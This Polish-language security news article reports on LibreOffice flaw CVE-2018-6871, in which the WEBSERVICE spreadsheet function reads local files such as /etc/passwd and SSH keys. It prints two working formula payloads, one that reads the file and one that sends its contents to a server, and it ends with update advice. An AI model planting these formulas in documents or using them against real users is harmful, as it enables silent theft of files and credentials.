Poważna luka w LibreOffice: każdy może pobierać pliki z Twojego dysku

22 lutego 2018

Luka w LibreOffice CVE-2018-6871 dla wersji przed 5.4.5 i przed 6.0.1 dotyczy funkcji WEBSERVICE, z której korzystają MS Excel 2013 i MS Excel 2016, a także dokumenty LibreOffice Calc. Metoda ta ze 100% skutecznością pozwala w sposób niewidoczny dla użytkownika wstrzyknąć lokalne pliki do dokumentu lub wysłać napastnikowi np. zawartość plików z systemu Linux „/etc/passwd” czy chociażby „/.ssh/*”. Użycie tego samego triku oraz protokołów w adresie URL "ftp[:]//" lub „file[:]//” jest tak samo skuteczne w systemach Windows i macOS z zainstalowanym oprogramowaniem LibreOffice w podatnych wersjach.

Do odczytania zawartości dowolnego pliku na dysku można posłużyć się złośliwym dokumentem z zaszytym poleceniem:

=WEBSERVICE("/etc/passwd")

W podobny sposób można wysłać ten plik na zdalny serwer:

=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

Poważna luka w LibreOffice

Podatne są nie tylko dokumenty XLS generowane przez Libre Office Calc. Dal innych formatów np. DOC lub ODT wystarczy osadzić obiekt z LibreOffice Calc w innym dokumencie. Metoda została przetestowana i dołączona do pobrania w postaci exploita, który publicznie dostępny jest gotowy do zaimportowania do Metasploita.

Użytkownicy pakietu biurowego LibreOffice powinni jak najprędzej zaktualizować oprogramowanie do wersji stabilnych: 5.4.5 lub 6.0.1.

Pozostałe wszystkie warianty LibreOffice niezależnie od systemu operacyjnego mogą poważnie wpłynąć na bezpieczeństwo organizacji i użytkowników indywidualnych. Osoba atakująca, która wyśle ofierze spreparowany dokument, może pozyskać niemal dowolny plik z systemu operacyjnego. Warunek jest tylko jeden — do kradzieży pliku potrzebna jest wiedza o jego lokalizacji oraz uruchomienie złośliwego dokumentu. Dla plików systemowych lub konfiguracyjnych jest to bardzo łatwe do wykonania.

PODZIEL SIĘ:

Share on facebook
Share on twitter
Share on linkedin
Share on email
AUTOR: Adrian Ścibor
Redaktor prowadzący AVLab.pl i CheckLab.pl.
guest
0 komentarzy
Inline Feedbacks
View all comments

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA
BĄDŹ ZAWSZE NA BIEŻĄCO!
zapisz się

POLECANE PRODUKTY

YUBIKEY

Klucze zabezpieczające

100% ochrony przed phishingiem

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA
BĄDŹ ZAWSZE NA BIEŻĄCO!
zapisz się

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA E-MAIL I ZAWSZE BĄDŹ NA BIEŻĄCO!
zapisz się

POLECANE PRODUKTY

YUBICO

Klucze zabezpieczające

SILNE UWIERZYTELNIANIE DWUSKŁADNIKOWE, WIELOSKŁADNIKOWE I BEZ HASŁA